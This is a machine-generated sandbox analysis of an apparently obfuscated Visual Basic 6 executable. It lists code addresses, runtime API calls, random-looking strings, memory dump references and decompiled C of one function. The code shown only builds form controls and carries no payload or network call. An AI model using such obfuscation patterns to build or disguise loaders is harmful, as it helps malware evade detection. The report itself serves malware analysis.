0x0040d3ee
0x0040d3ee
0x0040d3f3
0x0040d3f8
0x0040d3fd
0x0040d3fd
0x0040d41b
0x0040d433
0x0040d436
0x0040d438
0x0040d445
0x0040d467
0x0040d447
0x0040d447
0x0040d449
0x0040d44e
0x0040d454
0x0040d45a
0x0040d45f
0x0040d45f
0x0040d471
0x0040d48c
0x0040d492
0x0040d494
0x0040d4a1
0x0040d4c6
0x0040d4a3
0x0040d4a3
0x0040d4a8
0x0040d4ad
0x0040d4b3
0x0040d4b9
0x0040d4be
0x0040d4be
0x0040d4d4
0x0040d4db
0x0040d4e0
0x0040d4ee
0x0040d50b
0x0040d4f0
0x0040d4f0
0x0040d4f5
0x0040d4fa
0x0040d4ff
0x0040d4ff
0x0040d52f
0x0040d533
0x0040d538
0x0040d553
0x0040d559
0x0040d55b
0x0040d568
0x0040d58d
0x0040d56a
0x0040d56a
0x0040d56f
0x0040d574
0x0040d57a
0x0040d580
0x0040d585
0x0040d585
0x0040d59b
0x0040d5b8
0x0040d59d
0x0040d59d
0x0040d5a2
0x0040d5a7
0x0040d5ac
0x0040d5ac
0x0040d5dc
0x0040d5e0
0x0040d5e5
0x0040d600
0x0040d606
0x0040d608
0x0040d615
0x0040d63a
0x0040d617
0x0040d617
0x0040d61c
0x0040d621
0x0040d627
0x0040d62d
0x0040d632
0x0040d632
0x0040d648
0x0040d665
0x0040d64a
0x0040d64a
0x0040d64f
0x0040d654
0x0040d659
0x0040d659
0x0040d689
0x0040d68d
0x0040d692
0x0040d6ad
0x0040d6b0
0x0040d6b2
0x0040d6bf
0x0040d6e1
0x0040d6c1
0x0040d6c1
0x0040d6c3
0x0040d6c8
0x0040d6ce
0x0040d6d4
0x0040d6d9
0x0040d6d9
0x0040d6ef
0x0040d70c
0x0040d6f1
0x0040d6f1
0x0040d6f6
0x0040d6fb
0x0040d700
0x0040d700
0x0040d730
0x0040d734
0x0040d739
0x0040d754
0x0040d757
0x0040d759
0x0040d766
0x0040d788
0x0040d768
0x0040d768
0x0040d76a
0x0040d76f
0x0040d775
0x0040d77b
0x0040d780
0x0040d780
0x0040d796
0x0040d7b3
0x0040d798
0x0040d798
0x0040d79d
0x0040d7a2
0x0040d7a7
0x0040d7a7
0x0040d7d7
0x0040d7db
0x0040d7e0
0x0040d7f8
0x0040d7fe
0x0040d800
0x0040d80d
0x0040d832
0x0040d80f
0x0040d80f
0x0040d814
0x0040d819
0x0040d81f
0x0040d825
0x0040d82a
0x0040d82a
0x0040d840
0x0040d85d
0x0040d842
0x0040d842
0x0040d847
0x0040d84c
0x0040d851
0x0040d851
0x0040d881
0x0040d885
0x0040d88a
0x0040d8a5
0x0040d8ab
0x0040d8ad
0x0040d8ba
0x0040d8df
0x0040d8bc
0x0040d8bc
0x0040d8c1
0x0040d8c6
0x0040d8cc
0x0040d8d2
0x0040d8d7
0x0040d8d7
0x0040d8ed
0x0040d90a
0x0040d8ef
0x0040d8ef
0x0040d8f4
0x0040d8f9
0x0040d8fe
0x0040d8fe
0x0040d92e
0x0040d932
0x0040d937
0x0040d94f
0x0040d955
0x0040d957
0x0040d964
0x0040d989
0x0040d966
0x0040d966
0x0040d96b
0x0040d970
0x0040d976
0x0040d97c
0x0040d981
0x0040d981
0x0040d993
0x0040d999
0x0040d9a6
0x0040d9ae
0x0040d9b4
0x0040d9be
0x0040d9c1
0x0040d9ce
0x0040d9da
0x0040d9e7
0x0040d9f6
0x0040da08
0x0040da12
0x0040da13
0x0040da14
0x0040da15
0x0040da48
0x0040da4e
0x0040da5b
0x0040da7d
0x0040da5d
0x0040da5d
0x0040da62
0x0040da67
0x0040da6a
0x0040da70
0x0040da75
0x0040da75
0x0040da8e
0x0040dab4
0x0040dab9
0x0040dabf
0x0040dac4
0x0040dacb
0x0040dad5
0x0040dae8
0x0040daed
0x0040daf7
0x0040db01
0x0040db13
0x0040db1d
0x0040db20
0x0040db2b
0x0040db3f
0x0040db4c
0x0040db4d
0x0040db4e
0x0040db4f
0x0040db50
0x0040db67
0x0040db79
0x0040db7f
0x0040db8c
0x0040dbae
0x0040db8e
0x0040db8e
0x0040db93
0x0040db98
0x0040db9b
0x0040dba1
0x0040dba6
0x0040dba6
0x0040dbbb
0x0040dbc1
0x0040dbc5
0x0040dbc6
0x0040dbc8
0x0040dbcd
0x0040dbd3
0x0040dbd8
0x0040dbe6
0x0040dc03
0x0040dbe8
0x0040dbe8
0x0040dbed
0x0040dbf2
0x0040dbf7
0x0040dbf7
0x0040dc27
0x0040dc2b
0x0040dc30
0x0040dc48
0x0040dc4e
0x0040dc50
0x0040dc5d
0x0040dc82
0x0040dc5f
0x0040dc5f
0x0040dc64
0x0040dc69
0x0040dc6f
0x0040dc75
0x0040dc7a
0x0040dc7a
0x0040dc90
0x0040dcad
0x0040dc92
0x0040dc92
0x0040dc97
0x0040dc9c
0x0040dca1
0x0040dca1
0x0040dcd1
0x0040dcd5
0x0040dcda
0x0040dcf2
0x0040dcf8
0x0040dcfa
0x0040dd07
0x0040dd2c
0x0040dd09
0x0040dd09
0x0040dd0e
0x0040dd13
0x0040dd19
0x0040dd1f
0x0040dd24
0x0040dd24
0x0040dd36
0x0040dd3c
0x0040dd46
0x0040dd49
0x0040dd59
0x0040dd5f
0x0040dd6c
0x0040dd72
0x0040dd7c
0x0040dd7f
0x0040dd90
0x0040dd9d
0x0040dd9e
0x0040dd9f
0x0040dda0
0x0040ddca
0x0040ddd0
0x0040dddd
0x0040ddff
0x0040dddf
0x0040dddf
0x0040dde4
0x0040dde9
0x0040ddec
0x0040ddf2
0x0040ddf7
0x0040ddf7
0x0040de0c
0x0040de12
0x0040de16
0x0040de17
0x0040de19
0x0040de27
0x0040de2b
0x0040de2c
0x0040de2e
0x0040de33
0x0040de36
0x0040de44
0x0040de61
0x0040de46
0x0040de46
0x0040de4b
0x0040de50
0x0040de55
0x0040de55
0x0040de85
0x0040de89
0x0040de8e
0x0040dea9
0x0040deac
0x0040deae
0x0040debb
0x0040dedd
0x0040debd
0x0040debd
0x0040debf
0x0040dec4
0x0040deca
0x0040ded0
0x0040ded5
0x0040ded5
0x0040deeb
0x0040df08
0x0040deed
0x0040deed
0x0040def2
0x0040def7
0x0040defc
0x0040defc
0x0040df2c
0x0040df30
0x0040df35
0x0040df50
0x0040df53
0x0040df55
0x0040df62
0x0040df84
0x0040df64
0x0040df64
0x0040df66
0x0040df6b
0x0040df71
0x0040df77
0x0040df7c
0x0040df7c
0x0040df90
0x0040df93
0x0040df98
0x0040df9f
0x0040dfac
0x0040dfc0
0x0040dfcf
0x0040dfde
0x0040dff0
0x0040dffb
0x0040e008
0x0040e00f
0x0040e017
0x0040e01b
0x0040e01c
0x0040e01e
0x0040e023
0x0040e029
0x0040e02e
0x0040e03c
0x0040e059
0x0040e03e
0x0040e03e
0x0040e043
0x0040e048
0x0040e04d
0x0040e04d
0x0040e07d
0x0040e081
0x0040e086
0x0040e0a1
0x0040e0a7
0x0040e0a9
0x0040e0b6
0x0040e0db
0x0040e0b8
0x0040e0b8
0x0040e0bd
0x0040e0c2
0x0040e0c8
0x0040e0ce
0x0040e0d3
0x0040e0d3
0x0040e0e9
0x0040e106
0x0040e0eb
0x0040e0eb
0x0040e0f0
0x0040e0f5
0x0040e0fa
0x0040e0fa
0x0040e12a
0x0040e12e
0x0040e133
0x0040e14e
0x0040e154
0x0040e156
0x0040e163
0x0040e188
0x0040e165
0x0040e165
0x0040e16a
0x0040e16f
0x0040e175
0x0040e17b
0x0040e180
0x0040e180
0x0040e196
0x0040e1b3
0x0040e198
0x0040e198
0x0040e19d
0x0040e1a2
0x0040e1a7
0x0040e1a7
0x0040e1d7
0x0040e1db
0x0040e1e0
0x0040e1fb
0x0040e201
0x0040e203
0x0040e210
0x0040e235
0x0040e212
0x0040e212
0x0040e217
0x0040e21c
0x0040e222
0x0040e228
0x0040e22d
0x0040e22d
0x0040e243
0x0040e260
0x0040e245
0x0040e245
0x0040e24a
0x0040e24f
0x0040e254
0x0040e254
0x0040e284
0x0040e288
0x0040e28d
0x0040e2a8
0x0040e2ab
0x0040e2ad
0x0040e2ba
0x0040e2dc
0x0040e2bc
0x0040e2bc
0x0040e2be
0x0040e2c3
0x0040e2c9
0x0040e2cf
0x0040e2d4
0x0040e2d4
0x0040e2ea
0x0040e2f7
0x0040e304
0x0040e30b
0x0040e315
0x0040e343
0x0040e350
0x0040e351
0x0040e352
0x0040e353
0x0040e35c
0x0040e362
0x0040e36f
0x0040e391
0x0040e371
0x0040e371
0x0040e376
0x0040e37b
0x0040e37e
0x0040e384
0x0040e389
0x0040e389
0x0040e3aa
0x0040e3af
0x0040e3b2
0x0040e3c1
0x0040e3c7
0x0040e3d4
0x0040e3f6
0x0040e3d6
0x0040e3d6
0x0040e3db
0x0040e3e0
0x0040e3e3
0x0040e3e9
0x0040e3ee
0x0040e3ee
0x0040e3fd
0x0040e40b
0x0040e428
0x0040e40d
0x0040e40d
0x0040e412
0x0040e417
0x0040e41c
0x0040e41c
0x0040e44c
0x0040e450
0x0040e455
0x0040e46d
0x0040e473
0x0040e475
0x0040e482
0x0040e4a7
0x0040e484
0x0040e484
0x0040e489
0x0040e48e
0x0040e494
0x0040e49a
0x0040e49f
0x0040e49f
0x0040e4b1
0x0040e4b7
0x0040e4c1
0x0040e4c4
0x0040e4ce
0x0040e4d8
0x0040e4eb
0x0040e4f0
0x0040e4fa
0x0040e52b
0x0040e531
0x0040e53e
0x0040e560
0x0040e540
0x0040e540
0x0040e545
0x0040e54a
0x0040e54d
0x0040e553
0x0040e558
0x0040e558
0x0040e56d
0x0040e573
0x0040e57e
0x0040e582
0x0040e583
0x0040e585
0x0040e58a
0x0040e58d
0x0040e59b
0x0040e5b8
0x0040e59d
0x0040e59d
0x0040e5a2
0x0040e5a7
0x0040e5ac
0x0040e5ac
0x0040e5dc
0x0040e5e0
0x0040e5e5
0x0040e600
0x0040e603
0x0040e605
0x0040e612
0x0040e634
0x0040e614
0x0040e614
0x0040e616
0x0040e61b
0x0040e621
0x0040e627
0x0040e62c
0x0040e62c
0x0040e641
0x0040e64d
0x0040e66e
0x0040e677
0x0040e67c
0x0040e68a
0x0040e6a7
0x0040e68c
0x0040e68c
0x0040e691
0x0040e696
0x0040e69b
0x0040e69b
0x0040e6cb
0x0040e6cf
0x0040e6d4
0x0040e6ec
0x0040e6f2
0x0040e6f4
0x0040e701
0x0040e726
0x0040e703
0x0040e703
0x0040e708
0x0040e70d
0x0040e713
0x0040e719
0x0040e71e
0x0040e71e
0x0040e72d
0x0040e72f
0x0040e731
0x0040e737
0x0040e738
0x0040e73d
0x0040e747
0x0040e764
0x0040e749
0x0040e749
0x0040e74e
0x0040e753
0x0040e758
0x0040e758
0x0040e788
0x0040e78c
0x0040e791
0x0040e7ac
0x0040e7af
0x0040e7b1
0x0040e7be
0x0040e7e0
0x0040e7c0
0x0040e7c0
0x0040e7c2
0x0040e7c7
0x0040e7cd
0x0040e7d3
0x0040e7d8
0x0040e7d8
0x0040e7e7
0x0040e7eb
0x0040e7f0
0x0040e80b
0x0040e811
0x0040e81e
0x0040e840
0x0040e820
0x0040e820
0x0040e825
0x0040e82a
0x0040e82d
0x0040e833
0x0040e838
0x0040e838
0x0040e84a
0x0040e84e
0x0040e852
0x0040e853
0x0040e855
0x0040e85a
0x0040e860
0x0040e865
0x0040e873
0x0040e890
0x0040e875
0x0040e875
0x0040e87a
0x0040e87f
0x0040e884
0x0040e884
0x0040e8b4
0x0040e8b8
0x0040e8bd
0x0040e8d5
0x0040e8db
0x0040e8dd
0x0040e8ea
0x0040e90f
0x0040e8ec
0x0040e8ec
0x0040e8f1
0x0040e8f6
0x0040e8fc
0x0040e902
0x0040e907
0x0040e907
0x0040e916
0x0040e918
0x0040e91a
0x0040e920
0x0040e921
0x0040e926
0x0040e930
0x0040e94d
0x0040e932
0x0040e932
0x0040e937
0x0040e93c
0x0040e941
0x0040e941
0x0040e971
0x0040e975
0x0040e97a
0x0040e995
0x0040e998
0x0040e99a
0x0040e9a7
0x0040e9c9
0x0040e9a9
0x0040e9a9
0x0040e9ab
0x0040e9b0
0x0040e9b6
0x0040e9bc
0x0040e9c1
0x0040e9c1
0x0040e9d7
0x0040e9f4
0x0040e9d9
0x0040e9d9
0x0040e9de
0x0040e9e3
0x0040e9e8
0x0040e9e8
0x0040ea0e
0x0040ea18
0x0040ea1c
0x0040ea21
0x0040ea3c
0x0040ea42
0x0040ea44
0x0040ea51
0x0040ea76
0x0040ea53
0x0040ea53
0x0040ea58
0x0040ea5d
0x0040ea63
0x0040ea69
0x0040ea6e
0x0040ea6e
0x0040ea83
0x0040ea89
0x0040ea99
0x0040eaa3
0x0040eaa7
0x0040eabc
0x0040eac2
0x0040eacf
0x0040eaf1
0x0040ead1
0x0040ead1
0x0040ead6
0x0040eadb
0x0040eade
0x0040eae4
0x0040eae9
0x0040eae9
0x0040eb0a
0x0040eb15
0x0040eb1a
0x0040eb30
0x0040eb36
0x0040eb38
0x0040eb45
0x0040eb67
0x0040eb47
0x0040eb47
0x0040eb4c
0x0040eb51
0x0040eb54
0x0040eb5a
0x0040eb5f
0x0040eb5f
0x0040eb83
0x0040eb89
0x0040eb8b
0x0040eb98
0x0040ebba
0x0040eb9a
0x0040eb9a
0x0040eb9f
0x0040eba4
0x0040eba7
0x0040ebad
0x0040ebb2
0x0040ebb2
0x0040ebc1
0x0040ebca
0x0040ebcf
0x0040ebd6
0x0040ebdd
0x0040ebe4
0x0040ebe7
0x0040ebf7
0x0040ebf8
0x0040ebfa
0x0040ec05
0x0040ec09
0x0040ec0d
0x0040ec11
0x0040ec15
0x0040ec19
0x0040ec1d
0x0040ec21
0x0040ec22
0x0040ec24
0x0040ec32
0x0040ec39
0x0040ec40
0x0040ec47
0x0040ec48
0x0040ec4b
0x0040ec4c
0x0040ec4e
0x0040ec56

APIs

__vbaChkstk.MSVBVM60(?,004012B6), ref: 0040D2C2
#610.MSVBVM60(?,?,?,?,?,004012B6), ref: 0040D30A
#610.MSVBVM60(?,?,?,?,?,?,004012B6), ref: 0040D316
__vbaVarAdd.MSVBVM60(?,00000002,?,00000001,00000001), ref: 0040D348
#662.MSVBVM60(?,0040B1CC,?,00000000,?,00000002,?,00000001,00000001), ref: 0040D35E
__vbaVarTstNe.MSVBVM60(00008002,?,?,0040B1CC,?,00000000,?,00000002,?,00000001,00000001), ref: 0040D385
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00008002,?,?,0040B1CC,?,00000000,?,00000002,?,00000001,00000001), ref: 0040D3AC
#716.MSVBVM60(?,ufTzjJIsQNKXRsYTsDH8CMFnOLh801g4OZsr97,00000000,?,?,?,?,004012B6), ref: 0040D3D1
__vbaFreeVar.MSVBVM60(?,ufTzjJIsQNKXRsYTsDH8CMFnOLh801g4OZsr97,00000000,?,?,?,?,004012B6), ref: 0040D3D9
__vbaNew2.MSVBVM60(0040B244,004112D4,?,?,?,?,004012B6), ref: 0040D3F8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B234,00000014), ref: 0040D45A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B254,000000C0), ref: 0040D4B9
__vbaFreeObj.MSVBVM60(00000000,?,0040B254,000000C0), ref: 0040D4DB
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040D4FA
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D533
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000190), ref: 0040D580
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040D5A7
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D5E0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000000F0), ref: 0040D62D
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040D654
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D68D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000060), ref: 0040D6D4
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040D6FB
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D734
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000068), ref: 0040D77B
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040D7A2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D7DB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000000F8), ref: 0040D825
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040D84C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D885
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000150), ref: 0040D8D2
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040D8F9
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D932
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000001E0), ref: 0040D97C
__vbaStrMove.MSVBVM60(00000000,?,0040B290,000001E0), ref: 0040D9A6
__vbaStrCopy.MSVBVM60(00000000,?,0040B290,000001E0), ref: 0040D9F6
__vbaChkstk.MSVBVM60(?,?), ref: 0040DA08
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AF08,000006F8), ref: 0040DA70
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040DA8E
__vbaFreeObjList.MSVBVM60(00000007,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040DAB4
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040DABF
__vbaVarDup.MSVBVM60 ref: 0040DAE8
__vbaStrCopy.MSVBVM60 ref: 0040DB13
__vbaStrCopy.MSVBVM60 ref: 0040DB20
__vbaChkstk.MSVBVM60(?,?), ref: 0040DB3F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AF08,000006FC,?,?,?,?,?,?,7B},?,?), ref: 0040DBA1
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040DBC8
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,ufTzjJIsQNKXRsYTsDH8CMFnOLh801g4OZsr97,00000000,?,?), ref: 0040DBD3
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040DBF2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DC2B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000130), ref: 0040DC75
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040DC9C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DCD5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000108), ref: 0040DD1F
__vbaChkstk.MSVBVM60(?), ref: 0040DD90
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AF08,00000700), ref: 0040DDF2
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040DE19
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0040DE2E
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040DE50
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DE89
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000068), ref: 0040DED0
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040DEF7
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DF30
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000070), ref: 0040DF77
__vbaStrCopy.MSVBVM60(00000000,?,0040B290,00000070), ref: 0040DF93
__vbaFreeStr.MSVBVM60(?,?,?,?,?,00000003,?,?,00000000,?,?), ref: 0040E00F
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,00000003,?,?,00000000,?,?), ref: 0040E01E
__vbaFreeVar.MSVBVM60(?,0040B81C,00411010), ref: 0040E029
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040E048
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E081
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000190), ref: 0040E0CE
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040E0F5
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E12E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000000F0), ref: 0040E17B
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040E1A2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E1DB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000000E0), ref: 0040E228
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040E24F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E288
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000060), ref: 0040E2CF
__vbaChkstk.MSVBVM60(?,?,?,?,?), ref: 0040E343
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AF08,00000704), ref: 0040E384
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0040E3AA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AF08,00000708), ref: 0040E3E9
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040E417
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E450
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B290,00000178), ref: 0040E49A
__vbaVarDup.MSVBVM60(00000000,00000000,0040B290,00000178), ref: 0040E4EB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AF08,0000070C), ref: 0040E553
__vbaFreeObj.MSVBVM60(00000000,?,0040AF08,0000070C), ref: 0040E573
__vbaFreeVarList.MSVBVM60(00000002,00000003,00000009), ref: 0040E585
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040E5A7
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E5E0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000060), ref: 0040E627
__vbaFreeObj.MSVBVM60 ref: 0040E677
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040E696
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E6CF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000178), ref: 0040E719
__vbaLateIdCallLd.MSVBVM60(00000003,00000000,00000000,00000000), ref: 0040E738
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040E753
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E78C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000068), ref: 0040E7D3
__vbaI4Var.MSVBVM60(00000003), ref: 0040E7EB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AF08,00000710), ref: 0040E833
__vbaFreeObjList.MSVBVM60(00000003,?,?,00000000), ref: 0040E855
__vbaFreeVar.MSVBVM60(?,?,0040B81C,00411010,?,?,0040B81C,00411010,?,?,?,?,?,?,0040B81C,00411010), ref: 0040E860
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040E87F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E8B8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000178), ref: 0040E902
__vbaLateIdCallLd.MSVBVM60(00000003,00000000,00000000,00000000), ref: 0040E921
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040E93C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E975
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000068), ref: 0040E9BC
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040E9E3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040EA1C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000088), ref: 0040EA69
__vbaI4Var.MSVBVM60(00000003,?), ref: 0040EAA7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AF08,00000714), ref: 0040EAE4
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,00000000), ref: 0040EB0A
__vbaFreeVar.MSVBVM60(?,?,?,0040B81C), ref: 0040EB15
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AED8,000001B8), ref: 0040EB5A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AED8,000001BC), ref: 0040EBAD
__vbaOnError.MSVBVM60(000000FF), ref: 0040EBCA
__vbaFreeStrList.MSVBVM60(00000003,00000001), ref: 0040EBFA
__vbaFreeObjList.MSVBVM60(00000008,?,?,?,?,?,?,?,?), ref: 0040EC24
__vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040EC4E

Strings

Qh0H173, xrefs: 0040E30B
qtZ0YVDgR115, xrefs: 0040DB18
PFj3hYJ5vwEQPTGDe223, xrefs: 0040DF8B
fT186, xrefs: 0040DAED
b9UVneZWLXkDS125, xrefs: 0040E653
7B}, xrefs: 0040DB50, 0040DB56
XOQQMwmCGmqUH2xus102, xrefs: 0040DB0B
fUPuI258LdPeF8nWNkpe0FFXz0Od1fzRyo7rs9K86, xrefs: 0040DACB
qfJ8jTeIEQJkFt0h237, xrefs: 0040D9EE
ufTzjJIsQNKXRsYTsDH8CMFnOLh801g4OZsr97, xrefs: 0040D3C8
lGTv3G208, xrefs: 0040E4CE

Memory Dump Source

Source File: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.595841703.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.595851863.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.595908678.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckHresult$Free$New2$List$Chkstk$Copy$#610CallLate$#662#716ErrorMove
String ID: 7B}$PFj3hYJ5vwEQPTGDe223$Qh0H173$XOQQMwmCGmqUH2xus102$b9UVneZWLXkDS125$fT186$fUPuI258LdPeF8nWNkpe0FFXz0Od1fzRyo7rs9K86$lGTv3G208$qfJ8jTeIEQJkFt0h237$qtZ0YVDgR115$ufTzjJIsQNKXRsYTsDH8CMFnOLh801g4OZsr97
API String ID: 435432835-2395245889
Opcode ID: 6fc5c3db78c1c031ddfca2017aa3e6d0353feb0757b70c8afd51aee80dbfa802
Instruction ID: c8a79c2c8dbebbca63836d05cbccf146fa1af3c63ff30eb20912f0675ad4f39b
Opcode Fuzzy Hash: 6fc5c3db78c1c031ddfca2017aa3e6d0353feb0757b70c8afd51aee80dbfa802
Instruction Fuzzy Hash: 86F20771D402289FDB21DF90CC49BDDBBB8BB08304F1045EAE609B72A1D7795A85DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8B7, Relevance: 89.6, APIs: 40, Strings: 11, Instructions: 342
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E0040F8B7(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				void* _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v32;
				void* _v36;
				char _v40;
				intOrPtr _v48;
				char _v56;
				char _v72;
				signed int _v80;
				char _v88;
				char* _v96;
				intOrPtr _v104;
				char _v124;
				char _v128;
				void* _v132;
				signed int _v136;
				signed int _v140;
				signed int _v152;
				char _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v172;
				char _v176;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				intOrPtr _t133;
				signed int _t137;
				char* _t140;
				char* _t149;
				signed int _t153;
				char* _t157;
				short _t158;
				char* _t163;
				signed int _t166;
				char* _t170;
				signed int _t174;
				signed int _t177;
				intOrPtr _t194;
				void* _t211;
				void* _t214;
				intOrPtr _t215;
				void* _t217;
				intOrPtr* _t218;
				signed long long _t231;
				void* _t236;

				_t215 = _t214 - 0xc;
				 *[fs:0x0] = _t215;
				L004012B0();
				_v16 = _t215;
				_v12 = 0x401268;
				_v8 = 0;
				_t133 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012b6, _t211);
				L004013BE();
				asm("loopne 0xffffffea");
				0x5140f82d(0x40b3e0, L"VB.Comm");
				L004013BE();
				_v48 = _t133;
				_v56 = 8;
				_v96 = L"ZQ0LmXeBBdOak3nkpdU2Ht1cVVA3XgwEeu106";
				_v104 = 8;
				_t137 =  *((intOrPtr*)( *_a4 + 0x218))(_a4,  &_v40, L"ndButton");
				asm("fclex");
				_v132 = _t137;
				if(_v132 >= 0) {
					_v152 = _v152 & 0x00000000;
				} else {
					_push(0x218);
					_push(0x40aed8);
					_push(_a4);
					_push(_v132);
					L0040140C();
					_v152 = _t137;
				}
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(2);
				_push(L"Add");
				_push(_v40);
				_t140 =  &_v72;
				_push(_t140); // executed
				L0040136A(); // executed
				_push(_t140);
				L0040137C();
				_push(_t140);
				_push( &_v32);
				L00401382();
				L004013DC();
				L00401406();
				_push( &_v72);
				_push( &_v56);
				_push(2);
				L00401424();
				_t217 = _t215 + 0x3c;
				_v80 = L"kHU154";
				_v88 = 8;
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Caption");
				_push(_v32);
				L00401364();
				_v80 = 0x6a38;
				_v88 = 2;
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Left");
				_push(_v32);
				L00401364();
				if( *0x411010 != 0) {
					_v156 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v156 = 0x411010;
				}
				_t149 =  &_v40;
				L00401400();
				_v132 = _t149;
